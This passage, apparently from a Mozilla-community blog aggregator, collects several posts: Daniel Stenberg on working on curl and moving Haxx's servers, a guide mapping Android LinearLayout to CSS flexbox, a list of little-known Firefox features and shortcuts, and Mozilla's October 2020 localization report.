Over time, curl gradually grew popular and attracted more users. There was no sudden moment in time where I struck gold and everything took off. It was just slowly gaining ground while me and my fellow project members kept improving and polishing curl. At some point in time I happened to notice that curl and libcurl would appear in more and more acknowledgements and in open source license collections in products and devices.

It was still just a spare time project.

Proprietary Software for years

I’d like to emphasize that I worked as a contract and consultant developer for many years (over 20!), primarily on proprietary software and custom solutions, before I managed to land myself a position where I could primarily write open source as part of my job.

Mozilla

In 2014 I joined Mozilla and got the opportunity to work on the open source project Firefox for a living – and doing it entirely from my home. This was the first time in my career I actually spent most of my days on code that was made public and available to the world. They even allowed me to spend a part of my work hours on curl, even if that didn’t really help them and curl was not a fundamental part of any Mozilla work or products. It was still great.

I landed that job for Mozilla a lot thanks to my many years and long experience with portable network coding and running a successful open source project at this level.

My work setup with Mozilla made it possible for me to spend even more time on curl, apart from the (still going) two daily spare time hours. Nobody at Mozilla cared much about (my work with) curl and no one there even asked me about it. I worked on Firefox for a living.

For anyone wanting to do open source as part of their work, getting a job at a company that already does a lot of open source is probably the best path forward. Even if that might not be easy either, and it might also mean that you would have to accept working on some open source projects that you might not yourself be completely sold on.

In late 2018 I quit Mozilla, in part because I wanted to try to work with curl “for real” (and part other reasons that I’ll leave out here). curl was then already over twenty years old and was used more than ever before.

wolfSSL

I now work for wolfSSL. We sell curl support and related services to companies. Companies pay wolfSSL, wolfSSL pays me a salary and I get food on the table. This works as long as we can convince enough companies that this is a good idea.

The vast majority of curl users out there of course don’t pay anything and will never pay anything. We just need a small number of companies to do it – and it seems to be working. We help customers use curl better, we make curl better for them and we make them ship better products this way. It’s a win win. And I can work on open source all day long thanks to this.

My open source life-style

A normal day in the work week, I get up before 7 in the morning and I have breakfast with my family members: my wife and my two kids. Then I grab my first cup of coffee for the day and take the thirteen steps up the stairs to my “office”.

I sit down in front of my main development (Linux) machine with two 27″ screens and get to work.

<figcaption>Photo of my work desk from a few years ago but it looks very similar still today.</figcaption>

What work and in what order?

I lead the curl project. It means many questions and decisions fall down to me to have an opinion about or say on, and it’s a priority for me to make sure that I unblock such situations as soon as possible so that developers wanting to do things with curl can continue doing that.

Thus, I read and respond to email about curl all hours I’m awake and have network access. Of course incoming messages actually rarely require immediate responses and then I can queue them up and instead do them later. I also try to read and assess all new incoming curl issues as soon as possible to see if there’s something urgent I should deal with immediately, or otherwise figure out how to deal with them going forward.

I usually have a set of bugs or features to work on so when there’s no alarming email or GitHub issue left, I context-switch over to the curl source code tree and the particular branch in which I work on right now. I typically have 20-30 different branches of development of various stages and maturity going on. If I get stuck on something, or if I create a pull-request for one of them that needs time to get all the CI jobs done, I switch over to one of the others.

Customers and their needs of course have priority when I decide what to work on. The exception would perhaps be security vulnerabilities or other really serious bugs being reported, but thankfully they are rare. But after that, I go by ear and work on what I think is fun and what I think users might appreciate.

If I want to go forward with something, for my own sake or for a customer’s, and that entails touching or improving other software in other projects, then I don’t shy away from submitting pull requests for them – or at least filing an issue.

Spare time open source

Yes, I still spend my spare time hours on open source, mostly curl. This means I often end up spending 50-55 hours per week on curl and curl related activities. But I don’t count or measure work hours and I rarely have to report any to anyone. This is a work of love.

Lots of people will say that they don’t have time because of life, family, kids etc. I have of course been very fortunate over the years to have had the opportunity and ability to spend all this time on what I want to do, but let’s not forget that people in general spend lots of time on their hobbies; on watching TV, on playing computer games and on socializing with friends and why not: to sleep. If you cut down on all of those things (yes, including the sleeping) there could very well be opportunities. It’s often a question of priorities. I’ve made spare time development a priority in my life.

curl support?

Any company that uses curl or libcurl – and they are plenty – could benefit from buying support from us instead of wasting their own time and resources. We at wolfSSL are probably much better at curl already and we can find and fix the issues much faster, which ends up cheaper and better long-term.

Credits

The top photo is taken by Anja Stenberg, my wife. It’s me in a local forest, summer 2020.

Tiger OakesGoing from Android LinearLayout to CSS flexbox

Are you an Android developer looking to learn web development? I find it easier to learn a new technology stack by comparing it to a stack I’m already familiar with. Android developers can layout views using the simple yet flexible LinearLayout class. The web platform has similar tools to layout elements using CSS, and some concepts are shared. Here’s some tips to learn web development using your Android knowledge.

Let’s focus on a horizontal layout, similar to a LinearLayout with the "horizontal" orientation. The layout in Android may look something like this:

<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    id="@+id/horizontal"
    android:layout_width="200dp"
    android:layout_height="100dp"
    android:orientation="horizontal"
    android:gravity="center_vertical|center_horizontal">

  <TextView
    id="@+id/child1"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:layout_weight="1"
    android:background="#bcf5b1"
    android:text="One" />

  <TextView
    id="@+id/child2"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:layout_gravity="top"
    android:background="#aacaff"
    android:text="Two" />

  <TextView
    id="@+id/child3"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:background="#e3e2ad"
    android:text="Three" />

</LinearLayout>
One Two Three

On the web, layouts are split across two languages: HTML for declaring elements (similar to XML files in Android declaring views) and CSS for declaring styling (similar to the styles.xml file).

<div id="horizontal">
  <span id="child1">One</span>
  <span id="child2">Two</span>
  <span id="child3">Three</span>
</div>
#horizontal {
  width: 200px;
  height: 100px;
  display: flex;
  flex-direction: row;
  justify-content: center;
  align-items: center;
}

#child1 {
  background: #bcf5b1;
  flex-grow: 1;
}

#child2 {
  background: #aacaff;
  align-self: flex-start;
}

#child3 {
  background: #e3e2ad;
}

These files look somewhat similar to the Android XML, except that most attributes have been moved to CSS and have different names. CSS allows you to specify blocks of rules. Rules have a selector to indicate which element the styles are applied to, with the # character corresponding to an ID. Inside the rules are various declarations: pairs of properties and values.

Let’s break down some of these properties and how they correspond to Android’s LinearLayout.

width and height

The CSS width and height properties correspond to android:layout_width and android:layout_height. The pixel unit (px) is used in place of density independent pixels (dp). CSS pixels correspond 1:1 with density independent pixels, and do not necessarily correspond to the actual amount of pixels and element takes up on a device.

Inline text elements like span default to wrapping their content, so we don’t need to set an explicit width and height.

display: flex

The display property sets the layout used for an element’s children. It’s used in place of the LinearLayout tag to specify the layout system. Having this information in CSS instead of the HTML/XML allows web developers to change the layout system in response to screen size or other factors.

The flex display value, also known as Flexbox layout, corresponds roughly with LinearLayout, and I’ll focus on it in this post.

flex-direction

flex-direction lets you set the layout direction, just like the android:orientation attribute. Rather than "horizontal" and "vertical", you can set the value to be row or column. Just as LinearLayout defaults to horizontal orientation, flexbox direction defaults to row.

justify-content and align-items

In Android, the gravity for a view can be set on both axis in a single attribute. center_vertical and center_horizontal can be used at the same time, or even combined into the shorthand android:gravity="center".

CSS breaks up the attribute into two different properties, depending on the axis. These properties are relative to the flex-direction rather than the absolute direction, so “top” will be different between horizontal and vertical content.

justify-content sets the alignment of items in the direction of the flexbox. When flex-direction is set to row, justify-content affects the horizontal layout. Using the value center corresponds with android:gravity="center_horizontal".

align-items sets the alignment of items perpendicular to the direction of the flexbox. When flex-direction is set to row, align-items affects the vertical layout. Using the value center corresponds with android:gravity="center_vertical".

flex-grow

Children of a LinearLayout can have a layout_weight assigned to them, allowing the child to be stretched. Available space will be distributed among children based on their weight values, which defaults to 0. CSS flexbox has the equivalent flew-grow property, which has the exact same behavior.

align-self

The alignment of a single item in a flexbox can be overridden using the align-self property. This corresponds with android:layout_gravity. Like align-items, the values are perpendicular to the flex-direction instead of absolute directions. When flex-direction is set to row, flex-start represents the top of the container. Similarly, flex-end represents the bottom of the container.

Flexbox layout is capable of much more than LinearLayout, and its a commonly used tool in web development. If you’re looking to work on some CSS, or if you’re a web developer reading this post in reverse, I hope this comparison helped you!

Mike HoyeNavigational Instruments

A decade ago I got to sit in on a talk by one of the designers of Microsoft Office who’d worked on the transition to the new Ribbon user interface. There was a lot to learn there, but the most interesting thing was when he explained the core rationale for the redesign: of the top ten new feature requests for Office, every year, six to eight of them were already features built into the product, and had been for at least one previous version. They’d already built all this stuff people kept saying they wanted, and nobody could find it to use it.

It comes up periodically at my job that we have the same problem; there are so many useful features in Firefox that approximately nobody knows about, even people who’ve been using the browser every day and soaking in the codebase for years. People who work here still find themselves saying “wait, you can do that?” when a colleague shows them some novel feature or way to get around the browser that hasn’t seen a lot of daylight.

In the hopes of putting this particular peeve to bed, I did a casual survey the other day of people’s favorite examples of underknown or underappreciated features in the product, and I’ve collected a bunch of them here. These aren’t Add-ons, as great as they are; this is what you get from Firefox out of the proverbial box. I’m going to say “Alt” and “Ctrl” a lot here, because I live in PC land, but if you’re on a Mac those are “Option” and “Command” respectively.

Starting at the top, one of the biggest differences between Firefox and basically everything else out there is right there at the top of the window, the address bar that we call the Quantumbar.

Most of the chromium-client-state browsers seem to be working hard to nerf out the address bar, and URLs in general. It’s my own paranoia, maybe, but I suspect the ultimate goal here is to make it easier to hide how much of that sweet, sweet behavioral data this will help companies siphon up unsupervised. Hoarding the right to look over your shoulder forever seems to be the name of the game in that space, and I’ve got a set of feelings about that you might be able to infer from this paragraph. It’s true that there’s a lot of implementation detail being exposed there, and it’s true that most people might not care so why show it, but being able to see into the guts of a process so you can understand and trust it is just about the whole point of the open-source exercise. Shoving that already-tiny porthole all the way back into the bowels of the raw codebase – particularly when the people doing the shoving have entire identities, careers and employers none of which would exist at all if they hadn’t leveraged the privileges of open software for themselves – is galling to watch, very obviously a selfish, bad-faith exercise. It reduces clicking a mouse around the Web to little more than clicking a TV remote, what Douglas Adams use to call the “point and grunt interface”.

Fortunately the spirit of the command line, in all its esoteric and hidden power, lives on in a few places in Firefox. Most notably in a rich set of Quantumbar shortcuts you can use to get around your browser state and history:

  • Start typing your search with ^ to show only matches in your browsing history.
  • * to show only matches in your bookmarks.
  • + to show only matches in bookmarks you’ve tagged.
  • % to show only matches in your currently open tabs.
  • # to show only matches where every search term is part of the title or part of a tag.
  • $ to show only matches where every search term is part of the web address (URL). The text “https://” or “http://” in the URL is ignored but not “file:///”.
  • Add ? to show only search suggestions.
  • Hitting Ctrl-enter in the URL bar works like autocomplete;”mozilla” go straight to www.mozilla.com, for example. Shift-enter will open a URL in a new tab.

Speaking of the Quantumbar, you can customize it by right-clicking any of the options in the three-dot “Page Options” pulldown menu, and adding them to the address bar. The screenshot tool is pretty great, but one of my personal favorites in that pile is Reader Mode. Did you know there’s text-to-speech built into Reader Mode? It surprised me, too. Click those headphones, see how it goes.

It’s sort of Quantumbar-adjacent, but once you’ve been using it for a few hours the Search Keyword feature is one of those things you just don’t go back to not having. If you right-click or a search field on just about any site, “Add a Keyword for this Search” is one of the options. give it a simple term or letter, then “<term or letter> <search term>” in the Quantumbar and you’re immediately doing that search. A lot of us have that set up for Bugzilla, Github, or Stack Overflow, but just about any search box on just about any site works. If you’re finding yourself searching particular forums, or anywhere search engines can’t reach, this is a fantastic feature.

There are a lot of other small navigation tricks that come in surprisingly handy:

  • Holding down Alt while selecting text allows you to select text within a link without triggering the link
  • Shift-right-click will show Firefox’s context menu even on sites that override it. This is great for Picture-In-Picture most video sites, and getting your expected context menu back from GDocs. (PiP is another feature I’m fond of.)
  • Clicking and dragging down on the forward and back buttons will show a list of previous or next pages this tab has visited.
  • You can use Ctrl-click and middle-mouseclick on most toolbar buttons to open whatever they point at in a new tab; Ctrl-reload  duplicates your current tab. You can use this trick to pop stuff out of the middle of your back and forward history stack into new tabs.
  • You can do this trick with the “view image”  option in the right-click menu, too – Ctrl-clicking that menu item will open that image in its own new tab.
  • New Tab then Undo – Ctrl-T then Ctrl-Z – will populate the address bar with the URL of the previously focused tab, and it’s useful to duplicate the current tab from the keyboard.
  • You can right click an iframe and use the This Frame option to open the iframe in a tab of its own, then access the URL and other things.
  • Ctrl+Shift+N will reopen the most recently closed window, Ctrl+Shift+T the most recently closed tab. The tabs are a history stack, so you can keep re-opening them.
  • Knowing you can use Ctrl-M to mute a tab is invaluable.

If you’re a tab-hoarder like me, there’s a lot here to make your life better; Ctrl-# for some N 1 to 8 will switch you to the Nth tab, and Ctrl-9 takes you to the rightmost tab (in left-to-right language layouts, it’s mirrored in RTL). You might want to look over the whole list of keyboard shortcuts, if that’s your thing. There are a lot of them. But probably the most underappreciated is that you can select multiple tabs by using Shift-click, so you can work on the as a group. Ctrl-click will also let you select non-adjacent tabs, as you might expect, and once you’ve selected a few you can:

  • Move them as a group, left, right, new window, into Container tabs, you name it.
  • Pin them (Pinned tabs are another fantastic feature, and the combination of pinned tabs and ctrl-# is very nice.)
  • Mute a bunch of tabs at once.
  • If you’ve got Sync set up – and if you’ve got more than one device, seriously, make your life better and set up sync! – you can right-click and send them all to a different device. If you’ve got Firefox on your phone, “send these ten tabs to my phone” is one click. That action is privacy-respecting, too – nobody can see what you’re sending over, not even Mozilla.

I suspect it’s also not widely appreciated that you can customize Firefox in some depth, another option not widely available in other browsers. Click that three-bar menu in the upper right, click customize; there’s a lot there.

  • You get light, dark and Alpenglow themes stock, and you can find a bunch more on AMO to suit your taste.
  • There’s a few buttons in there for features you didn’t know Firefox had, and you can put them wherever
  • Density is a nice tweak, and removing the title bar is great for squeezing more real estate out of smaller laptop screens.
  • Overflow menu is a great place to put lightly used extensions or buttons
  • There’s a few Easter eggs in there, too, I’m told?

You can also play some games with named profiles that a lot of people doing web development find useful as well. By modifyingyour desktop shortcuts to add “-P [profile name]” –no-remote” after the firefox.exe bit, you can have “personal Firefox” and “work Firefox” running independently and fully separately from each other. That’s getting a bit esoteric, but if you do a lot of webdev or testing you might find it helpful.

So, there you go, I hope it’s helpful.

I’ll keep that casual survey running for a while, but if your personal favorite pet feature isn’t in there, feel free to email me. I know there are more.

Daniel StenbergA server transition

The main physical server (we call it giant) we’ve been using at Haxx for a very long time to host sites and services for 20+ domains and even more mailing lists. The machine – a physical one – has been colocated in an ISP server room for over a decade and has served us very well. It has started to show its age.

Some of the more known sites and services it hosts are perhaps curl, c-ares, libssh2 and this blog (my entire daniel.haxx.se site). Some of these services are however primarily accessed via fronting CDN servers.

giant is a physical Dell PowerEdge 1850 server from 2005, which has undergone upgrades of CPU, disks and memory through the years.

giant featured an Intel X3440 Xeon CPU at 2.53GHz with 8GB of ram when decommissioned.

New host

The new host is of course entirely virtual and we’ve finally taken the step into the modern world of VPSes. The new machine is hosted by the same provider as before but as an entirely new instance.

We’ve upgraded the OS, all packages and we’ve remodeled how we run the web services and all our jobs and services from before have been moved into this new fresh server in an attempt to leave some of the worst legacies behind.

The former server will not be used anymore and will be powered down and sent for recycling.

Glitches in this new world

We’ve tried really hard to make this transition transparent and ideally not many users will notice anything or have a reason to bother about this, but of course we also realize that we probably have not managed this to 100% perfection. If you detect something on any of the services we run that used to work or exist but isn’t anymore, do let us know so that become aware of it and can work on a fix!

This site (daniel.haxx.se) already moved weeks ago and nobody noticed. The curl site changed on October 23 and are much more likely to get glitches because of all the many more scripts and automatic things setup for it. Both sites are served via Fastly so ordinary users will not detect or spot that there’s a new host in the back end.

Mozilla Localization (L10N)L10n Report: October 2020 Edition

New content and projects

What’s new or coming up in Firefox desktop

Upcoming deadlines:

  • Firefox 83 is currently in beta and will be released on November 17. The deadline to update localization is on November 8 (see the previous l10n report to understand why it moved closer to the release date).
  • There might be changes to the release schedule in December. If that happens, we’ll make sure to cover them in the upcoming report.

The number of new strings remains pretty low, but there was a change that landed without new string IDs: English switched from a hyphen (-) to an em dash (–) as separator for window titles. Since this is a choice that belongs to each locale, and the current translation might be already correct, we decided to not invalidate all existing translations and notify localizers instead.

You can see the details of the strings that changed in this changeset. The full list of IDs, in case you want to search for them in Pontoon:

  • browser-main-window
  • browser-main-window-mac
  • page-info-page
  • page-info-frame
  • webrtc-indicator-title
  • tabs.containers.tooltip
  • webrtcIndicator.windowtitle
  • timeline.cssanimation.nameLabel
  • timeline.csstransition.nameLabel
  • timeline.scriptanimation.nameLabel
  • toolbox.titleTemplate1
  • toolbox.titleTemplate2
  • TitleWithStatus
  • profileTooltip

Alternatively, you can search for “ – “ in Pontoon, but you’ll have to skim through a lot of results, since Pontoon searches also in comments.

What’s new or coming up in mobile

Firefox for iOS v29, as well as iOS v14, both recently shipped – bringing with them the possibility to make Firefox your default browser for the first time ever!

v29 also introduced a Firefox homescreen widget, and more widgets will likely come soon. Congratulations to all for helping localize these awesome new features!

v30 strings have just recently been exposed on Pontoon, and the deadline for l10n strings completion is November 4th. Screenshots will be updated for testing very soon.

Firefox for Android (“Fenix”) is currently open for localizing v83 strings. The next couple of weeks should be used for completing your current pending strings, as well as testing your work for the release. Take a look at our updated docs here!

What’s new or coming up in web projects

Mozilla.org

Recently, the monthly WNP pages that went out with the Firefox releases contained content promoting features that were not available for global markets or campaign messages that targeted select few markets. In these situations, for all the other locales, the page was always redirected to the evergreen WNP page.  As a result, please make it a high priority if your locale has not completed the page.

More pages were added and migrated to Fluent format. For migrated content, the web team has decided not to make any edits until there is a major content update or page layout redesign. Please take the time to resolve errors first as the page may have been activated. If a placeable error is not fixed, it will be shown on production.

Common Voice & WebThings Gateway

Both projects now have a new point of contact. If you want to add a new language or have any questions with the strings, send an email directly to the person first. Follow the projects’ latest development through the channels on Discourse. The l10n-drivers will continue to provide support to both teams through the Pontoon platform.

What’s new or coming up in SuMo

Please help us localize the following articles for Firefox 82 (desktop and Android):

What’s new or coming up in Pontoon

Spring cleaning on the road to Django 3. Our new contributor Philipp started the process of upgrading Django to the latest release. In a period of 12 days, he landed 12(!) patches, ranging from library updates and replacing out-of-date libraries with native Python and Django capabilities to making our testing infrastructure more consistent and dropping unused code. Well done, Philipp! Thanks to Axel and Jotes for the reviews.

Newly published localizer facing documentation

Firefox for Android docs have been updated to reflect the recent changes introduced by our migration to the new “Fenix” browser. We invite you to take a look as there are many changes to the Firefox for Android localization workflow.

Events

Kudos to these long time Mozillians who found creative ways to spread the words promoting their languages and sharing their experience by taking the public airways.

  • Wim of Frisian was interviewed by a local radio station where he shared his passion localizing Mozilla projects. He took the opportunity to promote Common Voice and call for volunteers speaking Frisian. Since the airing of the story, Frisian saw an increase with 11 hours spoken clips and an increase between 250 to 400 people donating their voices. The interview would be aired monthly.
  • Quentin of Occitan made an appearance in this local news story in the south of French, talking about using Pontoon to localize Mozilla products in Occitan.

Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Image by Elio Qoshi

  • Iskandar of Indonesian community for his huge efforts completing Firefox for Android (Fenix) localization in recent months.
  • Dian Ina and Andika of Indonesian community for their huge efforts completing the Thunderbird localization in recent months!

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.